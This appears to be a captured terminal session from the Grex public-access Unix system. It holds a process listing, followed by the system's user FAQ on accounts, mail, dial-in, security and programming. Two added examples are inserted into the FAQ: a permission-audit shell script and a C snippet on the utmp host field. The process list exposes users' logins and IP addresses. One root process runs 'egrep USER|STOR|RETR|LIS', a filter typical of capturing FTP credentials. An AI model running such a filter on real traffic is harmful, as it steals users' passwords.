      jopap    13073  0.0  0.4  552  876 sa S    18:19   0:01 pico.real -z all
      root     13324  0.0  0.1  124  264 r0 S    18:21   0:00 login -h 204.212.46.132
      menuadm  11776  0.0  0.0   60   96 pc S    18:12   0:02 talk saloon
      wasf     12131  0.0  0.0   48    0 q6 IW   18:15   0:00 /bin/sh /usr/local/bin/m
      root      9139  0.0  0.3  480  668 ?  S    17:51   0:17 sendmail: HAA21168 hcldl
      wasf     12185  0.0  0.3  460  620 q6 S    18:15   0:03 pine
      pfv      10360  0.0  0.0  192    0 u2 IW   18:02   0:01 tcsh -c ~pfv/bin/pfilt
      party    12426  0.0  0.1   80  336 q5 S    18:16   0:01 eggdrop
      root     10736  0.0  0.0  396    0 ?  IW   18:04   0:10 sendmail: FAA18438 rings
      greg99   12719  0.0  0.0  348    0 u8 IW   18:18   0:01 lynx
      party    10347  0.0  0.0   80  112 u2 S    18:01   0:04 /usr/local/bin/party_ #p
      root     13154  0.0  0.0  120    0 sb IW   18:20   0:00 login -h 63.23.174.219 -
      root     11357  0.0  0.0   56   60 ?  IW   18:09   0:07 telnetd ttyq8 207.91.203
      root     13276  0.0  0.0   92  188 ?  IW   18:20   0:00 mail -r reenaf@hotmail.c
      root      7217  0.0  0.0   96  104 ?  IW   20:57   0:06 egrep USER|STOR|RETR|LIS
      nobody   11759  0.0  0.3  216  680 ?  S    18:12   0:01 /usr/local/libexec/httpd
      root     11668  0.0  0.0   56    0 ?  IW   18:11   0:01 telnetd ttyp7 152.171.23
      root         0  0.0  0.0    0    0 ?  D    Oct 10154:26 swapper
      mystar   12365  0.0  0.1  504  340 tf S    18:16   0:05 lynx sports.yahoo.com
      joe      13217  0.0  0.0   68    0 t8 IW   18:20   0:01 -csh (csh)
      nobody   11761  0.0  0.3  216  708 ?  S    18:12   0:03 /usr/local/libexec/httpd
      > faq
                     Frequently Asked Questions About Grex
       
      General
       
      * What is Grex?
       
      Grex is a public-access computer conferencing system in Ann Arbor, Michigan,
      USA. It is cooperatively owned and operated, and is
      supported entirely by donations from users. All staff members are volunteers.
       
      * What does the name "Grex" mean?
       
      Grex is not an acronym. It is a Latin word meaning "flock". It is the root of
      a number of familiar English words such as aggregate,
      congregate, and gregarious.
       
      * What can I do on this system?
       
      Grex provides all of the following services for free.
       
        o Electronic conferencing using "PicoSpan" or "Backtalk"
        o Internet e-mail using "mail", "elm", "pine" or "mh"
        o Browse the web in text mode using "lynx"
        o Access to usenet via "lynx" to the dejanews web site
        o Multichannel real-time chat using "party"
        o Free text-only web site hosting.
        o On-line games, including "Nethack"
        o Access to a Unix shell account, with all standard commands
        o Access to the C/C++ compiler, assembler, and other development tools
       
      However, Grex does not provide any of the following services at all:
       
        o Download areas
        o Mailing lists
        o Bots (for IRC or anything else)
        o Graphical web page hosting
        o A place to store files
       
      And there are a few things you can only do if you are a member (who has made a
      donation and sent ID). These are
       
        o Vote in Grex elections.
        o Serve on the board of Cyberspace Communications.
        o Access telnet, ftp, and irc sites from Grex.
        o Access web sites running on unusual ports, via lynx from Grex.
       
      * What operating system is Grex running?
       
      Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not
      Linux, but it is Unix, so in many ways it is similar to
      Linux. There are a lot of details about Grex's configuration available in the
      Grex staff notes on the web.
      http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and
      software.
       
      ----------------------------------------------------------------------------
       
      Conferencing
       
      * What is "computer conferencing?"
       
      A computer conference is an area set aside for discussion on some general
      topic, such as computers, politics, or gardening. In such
      an area, people can read what other people have posted, and can introduce new
      subtopics or add responses to existing ones. On
      many systems, conferences are called "forums". Grex has many conferences. For
      a complete list, see
      http://cyberspace.org/cgi-bin/bt/pistachio/conflist.
       
      * How can I participate in Grex's conferences?
       
      Grex's conferences are accessible by a text-based terminal interface or by the
      World Wide Web. To access the text-based interface,
      either dial direct or telnet to Grex and run the "bbs" command. (This command
      is run automatically every time you log in if you
      choose the "bbs shell" when you create your account.) World Wide Web access is
      provided by Grex's "Backtalk" conferencing
      software. Please see http://cyberspace.org/backtalk.html for details on using
      Backtalk.
       
      ----------------------------------------------------------------------------
       
      Governance
       
      * How is Grex governed?
       
      Cyberspace Communications functions as an online democracy, with policies set
      by its users. The Co-op Conference is open to all
      users and provides a forum for discussing policy issues. The Board of
      Directors, elected by the members, is the formal governing
      body and uses consensus in the Co-op Conference as its primary guide for
      making decisions. Any member of Grex who can attend
      the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the
      Board of Directors. In addition, any member can call a
      binding vote by the membership on any policy issue. The Articles of
      Incorporation and Bylaws can be viewed online.
       
      * How can I participate in Grex governance?
       
      Any user can have a voice in Grex governance by joining the Co-op conference
      and participating in the discussions there. If you
      wish to be eligible to vote in Grex elections and to run for the Board of
      Directors, you can become a Grex member. Membership
      dues are US$6/month or US$60/year. To find out how to make membership
      payments, please see
      http://cyberspace.org/member.html. Membership donations are Grex's primary
      source of financing.
       
      * Can I pay for membership by credit card?
       
      Unfortunately, no. Grex has investigated the possibility of accepting
      memberships by credit card, but the setup cost and monthly
      charges that we would have to pay to the bank are too high for us to pay. We
      do accept personal checks in US funds drawn on a US
      bank, US currency (not recommended to send by mail), and international money
      orders.
       
      ----------------------------------------------------------------------------
       
      How do I ... ?
       
      * How do I change my name, my shell, my mail forwarding, my password, or my
      terminal type?
       
      You can change any of these properties of your account with the "change"
      command. If you are using a menu or if you are at a bbs
      (Ok) prompt, type "!change". If you are in lynx, type "!" (an exclamation
      point) to get to a shell prompt first. At a shell prompt, type
      "change" and follow the menu-based instructions.
       
      * How do I change my login ID?
       
      You can't change it. Instead, you have to create a new account with the login
      ID that you wish. Once you have done that, you can
      copy the files that you need from your old account to your new one. When you
      no longer need your old account, you can ask to have
      it deleted by sending a request from your old account to staff@cyberspace.org.
       
      * How do I set up a web page?
       
      There is a completely separate FAQ for all questions related to the Grex web
      server. Please see
      http://www.cyberspace.org/local/grex/wwwfaq.html.
       
      * How do I run irc?
       
      Unless you are a paying member, you can't use IRC because the protocol is
      blocked for free accounts. For more detailed
      information about this, see the Grex Eggdrop Page from the Grex Staff Notes.
       
      If you are a guest user, you cannot access IRC. You can chat on-line within
      the Grex community by using "party" (see chatting,
      below). Paying members just need to type "irc" to run the ircii client
      program, which is installed for this purpose.
       
      * How do I chat with others?
       
      Grex has six ways of chatting:
       
        o 'party' is a chat program that many people can run at once.
        o 'write' sends text to the other person's screen one line at a time.
        o 'chat' is like 'write' but it sends one character at a time.
        o 'tel' is like 'write' but it sends only one line and then stops.
        o 'talk' splits the screen in half, so both people can type at once.
        o 'ytalk' is like talk but can accommodate more than two people.
       
      * How do I find out who is waiting to log in?
       
      You can't find which accounts are waiting. People don't log in until after
      they get out of the telnet queue, so the system doesn't
      actually know who the people in the queue are.
       
      You can get some amount of information about who is in the queue. The command:
       
          fixwait -l
       
      will give you a list of the IP addresses that people on Grex are coming from,
      including people in the queue. If your friend has a
      unique IP address, you may be able to recognize it in the list.
       
      * How do I get out of vi?
       
      vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning
      curve at first. You can usually tell that you are in vi
      when you have a vertical line of squiggles (tildes) on the left of your
      screen. If you are trapped in vi, remember to type the escape
      key and then :q! (colon-q-exclamation point) followed by a return. The pico
      editor is a much friendlier editor for less experienced
      users.
       
      * How do I access Usenet news?
       
      Grex does not maintain its own base of Usenet news, because this requires too
      much space and too much of our internet link. So
      there is no usenet client program on Grex. However, you can access Usenet via
      the "lynx" web browser. Just connect to
      http://dejanews.com/.
       
      * How do I run X-windows?
       
      Grex does not support graphical interfaces such as X-windows. This service
      requires many more resources than the text-based
      service that Grex provides. It would use far too much CPU time and bandwidth
      for Grex to be able to support it.
       
      * How do I restore a lost file from a backup tape?
       
      We can't do that. We just don't have time. Grex makes regular backups onto
      tape, but this is an enormously time consuming
      process. The purpose of these backup tapes is to protect the system from
      disaster. Unfortunately, there is not enough time to honor
      requests from individual users to restore files from these tapes. Grex is not
      a good place to keep any file that you cannot afford to
      lose. If you have an important file on Grex, it is your responsibility to keep
      a backup of it on your own computer.
       
      * How do I get a list of Unix commands?
       
      There are so many Unix commands that we recommend that users who are not
      familiar with Unix use the "menu" command to
      explore Grex. The most common commands are available there. If you really want
      a list, then run the Grex command
      "listcommands" to print a list of most Unix commands on Grex. (Built-in shell
      commands are not included). This will take a long time
      to run.
       
      * How do I use Unix commands?
       
      The Unix operating system is amazingly powerful and flexible, with thousands
      of commands. Unix can be a challenge to get started
      with, but if you are interested in learning Unix, Grex is a good place to
      start, since we do give you access to almost all commands.
      For a good introduction to basic Unix and VI usage, see Christopher Taylor's
      witty tutorial Unix is a Four Letter Word, or the
      University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good
      page of Unix links at the UNIX Reference Desk.
       
      Online reference information about most commands can be called up via the
      "man" command. For example, for information about
      the date command, type
       
          man date
       
      ----------------------------------------------------------------------------
       
      Accounts and Passwords
       
      * Why do numbers appear before the login prompt?
       
      If you are telnetting to Grex when it is full, you must wait in a queue for a
      free port to telnet into. These numbers are telling you your
      place in line. There usually is no queue in the evenings in the eastern US and
      on weekends.
       
      * Why do I get a login prompt after I log out?
       
      This is in case there is a queue. It permits you to log in without waiting
      through the queue a second time. It is safe to disconnect
      when you are at the login prompt, or you can type "bye" or "exit" and Grex
      will disconnect.
       
      * Why does it say my new password is too obvious?
       
      Probably because it is too short, or only has lower case letters. It is
      important that internet vandals not be able to guess your
      password. Therefore, the Grex password change program is very particular about
      what it will accept. It is a good idea for your
      password to have at least 9 characters, at least one of which is an upper case
      letter, and at least one number or punctuation
      character embedded in it. Try the "genpass" program for some random passwords.
       
      * Why does it say my password is expiring?
       
      For security reasons, you should not keep the same password for too long. Grex
      passwords expire when they have not been
      changed for a whole year. All you have to do is run the "change" program to
      change your password, and you will stop getting
      nagged when you log in. Please remember to write your new password down when
      you change it, so you won't forget it.
       
      * Grex said, "3 failures since last login," when I logged in. What does this
      mean?
       
      When someone tries to log in to your account but does not know the password,
      Grex keeps count of failed login attempts. In general
      if there are only two or three of them, it probably means someone made a typo
      at the login prompt. This happens most often for
      accounts with very short user IDs and those with popular names, such as "ken".
      Less commonly, login failures may occur when
      someone runs telnet with the option to pass along the account name from
      another system. If it is a different account name, but
      matches yours, this will produce a failed login attempt for your account every
      time this person telnets to Grex.
       
      If there are 25 or 30 failed login attempts, or if the last successful login
      to your account wasn't yours, then it could mean that
      someone is trying to break in to your account. In general, most failed login
      attempts are from other people's typing errors and are not
      malicious. If you still suspect malicious activity, change your password
      (don't forget to write it down) and let the staff know so that
      they can investigate.
       
      * I can't remember my password. What do I do?
       
      Contact the Grex staff. Send mail from another site if you have access to
      email at another site. Send messages about access
      problems to staff@cyberspace.org. Remember to specify which account is the one
      you lost the password for.
       
      You can also log in to Grex as "trouble" without a password, which will send a
      message to the staff. Be sure to provide a postal
      address, an e-mail address, or a local telephone number, so that the staff can
      contact you in return.
       
      * I have a Grex account. Why do I get "No such loginid?"
       
      This means that your account has been deleted. Accounts on Grex are deleted if
      no one logs in for more than 3 months. There is not
      enough room on Grex to keep old unused accounts. To avoid losing your account,
      you should log in every month or two. Accessing
      your web page, or having your mail get forwarded does not count, but
      conferencing over the web using your account and password
      in Backtalk does count as logging in for this purpose.
       
      If your account has been deleted, it usually cannot be recovered or restored.
      Please feel free to recreate the account.
       
      * I don't want to use my account anymore. How do I get it deleted?
       
      If you don't want to wait until your account expires, you have to log in one
      last time and send a message to staff@cyberspace.org
      from the account that you want deleted. In your message, ask for it to be
      deleted.
       
      * Why can't I enter control-C when I am creating my account?
       
      When creating an account by telnet, you are asked to provide the characters
      you wish to use for various purposes. People using
      Macintosh NCSA Telnet have experienced the behavior that when they type ^C,
      the program exits rather than accepting the ^C as
      the designated control character.
       
      This is caused by undesirable preferences within that program and is easy to
      fix. Look at the "Session" menu, at the "Setup Keys"
      menu item (or hit command-S). You will probably find that you have a setting
      for "interrupt process" which is set to ^C. If so, NCSA
      Telnet is honoring this setting and sending the "interrupt process" signal
      (part of the time-worn telnet protocol) whenever you type
      ^C. Blank this setting out and then save your telnet set in a file. If you
      start telnetting by double clicking on the saved settings, you
      won't have to remember to clear it each time.
       
      ----------------------------------------------------------------------------
       
      E-Mail
       
      * How do I get Grex to forward my mail to another site?
       
      Use the "change" command. Just type "change" at a shell prompt or "!change" at
      any other prompt. This will invoke a menu that
      allows you to change almost any setting on your account, including the mail
      forwarding option. There are certain restrictions on the
      use of forwarding, so make sure you are following the rules.
       
      * I set up .forward myself. Why doesn't it work?
       
      Probably because it is not world readable. .forward files must be world
      readable in order to be valid on Grex. If you are looking for a
      way to forward your mail to an anonymous place, you need to find an anonymous
      remailer system. Grex doesn't do this. To make
      your .forward file world readable, change to your home directory (type: cd)
      and then issue this command:
       
          chmod 644 .forward
       
      Your home directory must also be world accessible; type:
       
          chmod 755 .
       
      or use 711 instead of 755 if you don't want other people to be able to scan
      your directory.
       
      * How can I hide my forwarding address?
       
      You can't. If you have forwarding enabled, the address must appear in the
      finger command. There is no way to hide the address that
      you are forwarding to. Grex does not wish to provide anonymous remailing
      services. You may wish to make use of one of the
      anonymous remailers listed on the Yahoo page
      http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_Mailers/.
       
      * How do I read mail with Netscape or Eudora?
       
      You can't. Those are POP clients, and Grex doesn't run a POP server. This is
      because Grex is intended to be an on-line community,
      and having a POP server would encourage people to use Grex as a mail drop
      instead, never logging on, and so never having a
      chance to become part of the Grex community. You must log in to Grex in order
      to read your mail.
       
      * My mailbox is getting heavily spammed. What can I do?
       
      Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail
      transport system has numerous filters to reduce
      spam, but it does not eliminate it. The Grex staff may or may not be able to
      help you reduce the spam you are getting. The proper
      way to report spam is to forward a copy of one of the offending messages to
      abuse@cyberspace.org. Do not send multiple
      messages.
       
      The message you send MUST be accompanied by the full mail headers, so that we
      can determine its true origin. The origin of
      spam is often hidden, and may require detailed examination of these headers.
      If you use pine, you can view these headers with the
      "H" command.
       
      * Why is mail that I send to Grex getting rejected?
       
      This usually happens when the sending site is not configured properly.
      Problems in mail configuration can often lead to mail that
      has an invalid return address. Grex's mail system tries very hard to detect
      and reject invalid sending addresses, in order to reduce
      the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then
      Grex will reject it. If you think this is happening to
      your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and
      be sure to include all of the mail headers.
       
      Other common reasons for mail to Grex to be rejected are that it may be too
      large (over 100k) or your mailbox may have grown too
      large (over 600k). Mail will be rejected in these cases.
       
      * Why does pine say that it cannot open my mail folder?
       
      Actually, that is probably just a faulty error message. For new accounts, it
      only means that you haven't received any mail yet. Once
      you receive some mail, the message should go away forever. We are working on
      getting rid of this error message.
       
      * How do I get pine to save my outgoing mail?
       
      This feature is turned off on Grex by default, because lots of new users were
      accumulating vast files of old mail without ever
      knowing that they were doing it. You're quite welcome to create the folder, as
      long as you keep an eye on your disk usage so that
      you don't exceed Grex's 1 megabyte limit for your account. To create your
      saved-mail folder, go into the pine configuration screen
      and look for the setting for "default-fcc". Set it to "saved-mail" or whatever
      name you would like to use. You need to use quotation
      marks around the file name.
       
      * How do I send attachments?
       
      Please do not send large attachments. If you have a small one, so that your
      mail remains under 100 K bytes in size, then you can
      send attachments from Grex.
       
      Once the file is in your home directory on Grex, then when composing a message
      in pine, put the file name on the attachments line.
      Please remember to delete the file after sending it as an attachment, so that
      you do not fill up your allotted disk space.
       
      * How can I view an attachment file named myfile.doc?
       
      Any file that ends with ".doc" is probably a Microsoft Word file. There is no
      way to view such a file on Grex. You will have to
      download that file to a computer that has Microsoft Word or some other word
      processor that can import such files.
       
      * How can I set the "From" header in pine for my outgoing mail?
       
      In Pine on Grex, you can't set the "From:" field. This is disabled because
      there were too many problems with people setting invalid
      addresses, which caused their outgoing mail to bounce to the postmaster
      whenever it was undeliverable.
       
      * How do I set up a mailing list here?
       
      You can't. We're sorry, but this is not permitted. You can only forward mail
      to a single site elsewhere on the internet. Mailing lists are
      too resource intensive for Grex to support. You may wish to try using an
      advertising-based free mailing list service. The Free Center
      maintains a rated list of free mailing list providers.
       
      * Is it OK to collect my mail by FTP?
       
      Yes, but you must do it correctly.
       
      It is extremely risky to attempt to transfer your mail spool file directly
      off of Grex by FTP. You risk losing some or all of your
      collected mail, because the FTP daemon does not participate in the locking
      scheme used by the mail delivery programs on Grex. In
      addition, your account may appear to be abandoned because FTP connections do
      not update the date of last login. This could
      result in loss of your account if it is the only way you use Grex.
       
      Instead, we recommend telnetting to Grex and running a mail client program.
      These all do participate in the locking mechanism for
      the mail spool. Collect all of your mail into a file in your home directory,
      and then log out. You may now safely fetch that file in your
      home directory by FTP. Please remember to delete it once it has been safely
      transferred.
       
      * Why can't I get procmail to work?
       
      Procmail is a mail filtering program, but it stopped working when Grex
      reorganized its mail system to use hierarchical mail
      directories. Grex really needs to have the mail organized hierarchically
      because of the very large number of users receiving mail.
      We hope to see procmail restored some day, but at the moment it is broken, and
      no schedule has been established for correcting it.
       
      * Can I set up an autoresponder to answer my mail while I am away for a while?
       
      Yes. Try the vacation program. The instructions can be found by typing "man
      vacation".
       
      ----------------------------------------------------------------------------
       
      Dialing In
       
      * How can I dial into Grex?
       
      The short answer is to dial (734) 761-3000 with your terminal software set to
      8-N-1. This process is described in detail in Grex's
      dial-up access information page.
       
      * If Grex doesn't answer the phone, how many times should I let it ring?
       
      We try very hard to keep all of the modems working properly, but sometimes,
      you may encounter a failure. Grex's phone lines are all
      configured so that if one modem doesn't answer after 3 rings, you are
      automatically transferred to the next line in the trunk hunt. If
      there happens to be a stuck modem, you need to wait at least 4 rings before a
      second one gets a chance to work. If there are two
      bad modems, then 7 rings are required.
       
      * If I can't get on by calling (734) 761-3000, is there another number I can
        try?
       
      No. Grex used to publicize other numbers in the interior of the hunt group,
      but there is no longer any advantage to calling any other
      number, because of this automatic stepping feature. Even if Grex is down, the
      phone should pick up once it steps past any bad
      modems. If it is down for an extended period, you should receive a short
      explanation from the terminal server. If the terminal server
      has failed, or the power to Grex's building has failed, the phones will not
      answer, but these conditions are very rare.
       
      * Why can't I get file transfer to work except for small files?
       
      Probably because you don't have a modem cable that is capable of handling
      hardware flow control, or your modem doesn't support
      it or has the feature turned off.
       
      ----------------------------------------------------------------------------
       
      Privacy, Encryption, and Security
       
      * My personal information should be private. Why is it shown?
       
      When you look up your own user information, you can always see it, even if it
      is set up so that nobody else on the system can see it.
      To see what other people see, ask for the info about
      "youraccount@cyberspace.org" instead of just "youraccount".
       
      * How can I keep private the place I'm logged on from?
       
      This is considered public information on Grex. The only way to hide it is not
      to log on.
       
      * I am receiving unwanted chat requests. What can I do?
       
      You can adjust the chat settings for your account with the "change" command.
      To run it, type "change" at a shell prompt, or
      "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and
      follow the menus from there. You can: turn off all
      chat requests, accept all chat requests, or select which users can and cannot
      chat with you.
       
      * How can I view my friend's files?
       
      Grex is a very open system, so directories are open to the public unless the
      owner decides to make them private. E-mail, however,
      is automatically saved in private files that the world cannot see.
       
      To permit a file so that it can be seen by others, type
       
          chmod a+r file-name
       
      To permit a directory, type
       
          chmod a+rx dir-name
       
      To hide a file or directory, type
       
          chmod ou-rx file-or-dir-name
       
      If you hide your home directory completely, neither mail forwarding nor web
      hosting will be available to you. You may make your
      directory accessible without allowing it to be scanned. This is how:
       
          chmod 711 dir-name
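
The permission rules in the ".forward" answer and in the answer above can be checked in one pass. This shell sketch is an added example, not part of the Grex FAQ or Grex's own tooling; the function names, the output wording, and the extra warning for write access by other users are assumptions made here.

```shell
#!/bin/sh
# Added example (not from the Grex FAQ): audit a home directory against the
# permission rules the FAQ states for .forward and for home directories.

# mode_of PATH: print the 10-character mode string from ls, e.g. "drwx--x--x".
mode_of() {
    ls -ld "$1" 2>/dev/null | cut -c1-10
}

# others_bit PATH r|w|x: succeed if that bit is set for "other" users.
others_bit() {
    m=$(mode_of "$1")
    [ -n "$m" ] || return 2
    case "$2" in
        r) c=$(printf '%s' "$m" | cut -c8) ;;
        w) c=$(printf '%s' "$m" | cut -c9) ;;
        x) c=$(printf '%s' "$m" | cut -c10) ;;
        *) return 2 ;;
    esac
    # "-" means unset; "T" is the sticky bit shown without execute permission.
    case "$c" in
        -|T) return 1 ;;
        *)   return 0 ;;
    esac
}

# audit_home DIR: print one finding per line; return 0 only if forwarding can
# work and nobody else can rewrite the forwarding target.
audit_home() {
    home=$1
    rc=0
    if [ ! -d "$home" ]; then
        echo "FAIL: $home is not a directory"
        return 1
    fi
    if others_bit "$home" x; then
        if others_bit "$home" r; then
            echo "INFO: home is listable by others, as with 755; 711 stops scanning"
        else
            echo "OK: home is reachable but not listable, as with 711"
        fi
    else
        echo "FAIL: home is closed to others; forwarding and web hosting stop"
        rc=1
    fi
    # Assumption added here: write access for others is treated as a finding,
    # because whoever can write the directory can replace .forward.
    if others_bit "$home" w; then
        echo "WARN: home is writable by others"
        rc=1
    fi
    fwd=$home/.forward
    if [ -f "$fwd" ]; then
        if others_bit "$fwd" r; then
            echo "OK: .forward is world readable"
        else
            echo "FAIL: .forward is not world readable (chmod 644 .forward)"
            rc=1
        fi
        if others_bit "$fwd" w; then
            echo "WARN: .forward is world writable; anyone can redirect mail"
            rc=1
        fi
    else
        echo "INFO: no .forward file"
    fi
    return $rc
}

# Demo on a constructed throwaway directory, not a real account.
demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/home"
    echo "someone@example.org" > "$d/home/.forward"   # constructed address
    for modes in "711 644" "755 600" "700 644" "711 666"; do
        set -- $modes
        chmod "$1" "$d/home"
        chmod "$2" "$d/home/.forward"
        echo "== home $1, .forward $2"
        audit_home "$d/home" || echo "   -> needs fixing"
    done
    chmod 700 "$d/home"
    rm -rf "$d"
}

demo
```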
       
      * Can I run PGP on Grex to protect my e-mail messages from being seen by
        others?
       
      No. PGP is not available on Grex for a number of reasons. The two most
      compelling reasons are that it would not be legal, and it
      would not offer you the protection you seek. We would like to see it be
      legally available to all, but in order to be effective, PGP must
      be installed on your own computer, not on Grex. Encrypting or decrypting a
      message on Grex would mean that the message would
      have to travel over an insecure network in plaintext before encryption or
      after decryption, and this is not the way to protect your
      message.
       
      In order to install PGP on your home computer, North American users should go
      to the MIT PGP Distribution Site at
      http://web.mit.edu/network/pgp.html, and all other users should use the
      international PGP home page at http://www.ifi.uio.no/pgp/.
       
      * Do you provide secure shell?
       
      Yes, we do. Secure shell (ssh) is a good way to connect because your session
      is encrypted, so that passwords cannot be
      intercepted by sniffers. Unfortunately, it is not fully functional on Grex,
      because the ssh daemon is unable to wait in line with telnet
      users when there is a queue, so ssh connections will fail when the system is
      full. You may see a message like this when it fails:
       
          Warning: no access to tty (Bad file number).
       
      When there is no queue you can use ssh to connect to Grex without any
      trouble.
       
      ----------------------------------------------------------------------------
       
      Programming
       
      * How do I compile a program?
       
      To compile a C program named foo.c, type "gcc foo.c -o foo". This compiles
      foo.c and creates an executable program named foo. To run it, type "./foo".
      Likewise, to compile a C++ program named foo.cpp, type "g++ foo.cpp -o foo".
       
      Please check with the Grex staff before compiling programs you bring in from
      the net. Most of the useful programs are already
      installed here, and many others will not run on Grex, but compiling them on
      Grex wastes a lot of bandwidth and cpu time,
      resources that Grex is short on.
       
      * Why can't I get the C compiler to compile my program?
       
      Probably you are using the wrong C compiler. Grex has two compilers installed.
      cc is only used for building certain system
      executables. It is not ANSI standard, and it lacks certain standard include
      files. You need to use gcc instead. This is a fairly recent
      version of the Gnu C compiler. It is ANSI standard and very complete.
       
      * I compiled my program. Why won't the system run it?
       
      Usually this is because the program is not on your path. Unlike a DOS or
      Windows system, on Unix the current directory is not
      automatically placed on your path. So if you compile a program named foo, you
      cannot run it by just typing "foo". You need either to
      place the executable somewhere on your path, or to precede its name with ./
      (dot-slash) so you would type "./foo".
       
      * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?
       
      No. These are all servers, daemons, or programs that remain running after you
      have logged out. No program run by users is
      allowed to run after you log out. See the Grex Eggdrop Page from the Grex
      Staff Notes.
       
      At one time or another, the possibility of our installing some of these as
      official services has been discussed in the "coop"
      conference. We have never yet decided to do so, but if you are interested in
      pursuing this possibility, the Grex coop conference is
      the place to make your request.
       
      * Can I have a copy of Grex's newuser program?
       
      Yes, you can find out more about newuser, including availability, on this web
      page: http://www.cyberspace.org/~mdw/newuser.html.
       
      * Can I have a copy of Grex's write/chat/tel programs?
       
      Yes, you can find out more about write/chat/tel, including availability, on
      this web page: http://www.wwnet.net/~janc/write.html.
       
      * Can I have a copy of Grex's party program?
       
      Yes, you can find out more about party, including availability, on this web
      page: http://www.wwnet.net/~janc/software.html.
       
      ----------------------------------------------------------------------------
       
      Miscellaneous
       
      * Why does my browser say "Can't find application" when I click on the "Telnet
      In" link?
       
      You need to configure your browser to find your telnet application program.
      The exact instructions for doing this vary widely
      depending upon both your operating system and your browser. In Netscape 3 this
      setting can be found in "Options"/"General
      preferences"/"Applications". Select the telnet application that came with your
      system, or one you downloaded from the internet. For
      more details about telnet applications, see the Grex Telnet Information page
      at http://www.cyberspace.org/telnet.html.
       
      * When I try to telnet to Grex, it hangs. Why can't I connect?
       
      There are several things that can go wrong.
       
        o You don't have DNS working properly. In this case you can connect to Grex
          by using its IP address. See below.
        o You are accessing the net via a firewall which blocks telnet. In this case
          you need to contact your security administrator for the
          LAN which you are accessing the net from, and ask if there is a way to
          telnet through the firewall.
        o Your telnet client is not working properly. You would not be able to
          telnet to any other site, either. Have you tried any? Try
          telnetting to hvcn.org and see if you get a login prompt.
        o Grex is down. This happens occasionally. You can usually tell if Grex is
          down by trying to access the web site. Try reloading
          to eliminate the possibility of a cached page. This won't be a good test
          if your connection uses a caching proxy server.
        o If it is none of the above, send mail to The Grex Staff and explain
          everything you tried, and also please specify the IP address
          and the GMT time that your attempt failed. If you can provide the results
          of a ping or traceroute from your end, that may prove to be helpful, too.
       
      * Can I do a ping or traceroute from Grex?
       
      These tools are not available on Grex. Vandals were using them to attack other
      sites. This is a ludicrous thing to do from Grex,
      because Grex is so tiny that its CPU and net connection become overloaded long
      before any other system would even begin to
      notice that it was being attacked. But people were doing it anyway, and
      hurting Grex. Regrettably, the actions of a few thoughtless
      people have forced Grex to disable these potentially valuable network analysis
      tools.
       
      You may be able to use a remote traceroute server on the web. See
      http://www.traceroute.org/.
       
      * What is Grex's IP address?
       
      At the time this answer was last updated, the IP address of Grex was
      204.212.46.130. IP addresses may change at any time. In
      general we have little control over changes to our IP address. You should
      always use the hostname, because if the IP address does
      change, the DNS (Domain/Name Service) lookup of the hostname should produce
      the new IP address. If you are unsure if a problem is
      due to DNS, you can test to see if you can connect using our IP address.
      However, if you can, it is strongly recommended that you
      resolve the problem you are having with DNS, so that you do not have to rely
      on inherently unreliable IP addresses.
       
      * Why does the "who" command show numeric IP addresses for some users?
       
      That is because this information is stored in a file (utmp) which only permits
      16 characters of storage for this information. If the IP
      address exceeds 16 characters when converted to text form, then it is stored
      (and reported) only in its numeric form. This affects
      other commands besides the "who" command, such as the "finger" and "last"
      commands.
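
      The fixed-width host field described above, as an added C example (not part of
      the Grex FAQ or Grex's own code). It assumes "converted to text form" means the
      reverse-resolved hostname; the struct, function names and sample hosts are
      constructed for illustration. It also shows that a name of exactly 16 characters
      fills the field with no terminating NUL, so anything reading such records must
      bound its reads.

```c
#include <stdio.h>
#include <string.h>

#define UT_HOSTSIZE 16  /* field width stated in the FAQ answer */

/* Constructed stand-in for the remote-host field of a utmp record. */
struct host_record {
    char ut_host[UT_HOSTSIZE];  /* fixed width; NOT NUL-terminated when full */
};

/*
 * Fill the host field as the FAQ describes: keep the hostname if it fits
 * in 16 characters, otherwise fall back to the numeric address.
 * Returns 1 if the hostname was stored, 0 if the numeric form was stored,
 * -1 if neither fits (nothing is written).
 */
int record_host(struct host_record *r, const char *hostname, const char *ip)
{
    const char *chosen;
    int used_name;

    if (hostname != NULL && hostname[0] != '\0' &&
        strlen(hostname) <= UT_HOSTSIZE) {
        chosen = hostname;
        used_name = 1;
    } else if (ip != NULL && strlen(ip) <= UT_HOSTSIZE) {
        chosen = ip;            /* a dotted quad is at most 15 characters */
        used_name = 0;
    } else {
        return -1;
    }

    /* Pad with NULs, then copy without adding a terminator of our own. */
    memset(r->ut_host, 0, UT_HOSTSIZE);
    memcpy(r->ut_host, chosen, strlen(chosen));
    return used_name;
}

/*
 * Read the field back safely. The scan stops at the first NUL or at the
 * field width, whichever comes first, so a full 16-character entry never
 * runs into the bytes that follow it. Returns the number of characters
 * copied into out (out is always NUL-terminated when outlen > 0).
 */
size_t read_host(const struct host_record *r, char *out, size_t outlen)
{
    size_t n = 0;

    if (outlen == 0)
        return 0;
    while (n < UT_HOSTSIZE && r->ut_host[n] != '\0')
        n++;
    if (n > outlen - 1)
        n = outlen - 1;
    memcpy(out, r->ut_host, n);
    out[n] = '\0';
    return n;
}

int main(void)
{
    /* Constructed sample logins: hostname and numeric address pairs. */
    static const char *samples[][2] = {
        { "gw.example.com",      "192.0.2.1"  },  /* 14 chars: name kept    */
        { "host.example.org",    "192.0.2.10" },  /* 16 chars: fills field  */
        { "dialup7.example.net", "192.0.2.44" },  /* 19 chars: numeric form */
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct host_record r;
        char shown[UT_HOSTSIZE + 1];
        int kind = record_host(&r, samples[i][0], samples[i][1]);

        read_host(&r, shown, sizeof shown);
        printf("%-20s -> %-16s (%s)\n", samples[i][0], shown,
               kind == 1 ? "hostname" : "numeric");
    }
    return 0;
}
```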
       
      * How much disk space can I use and how can I determine how much I am using?
       
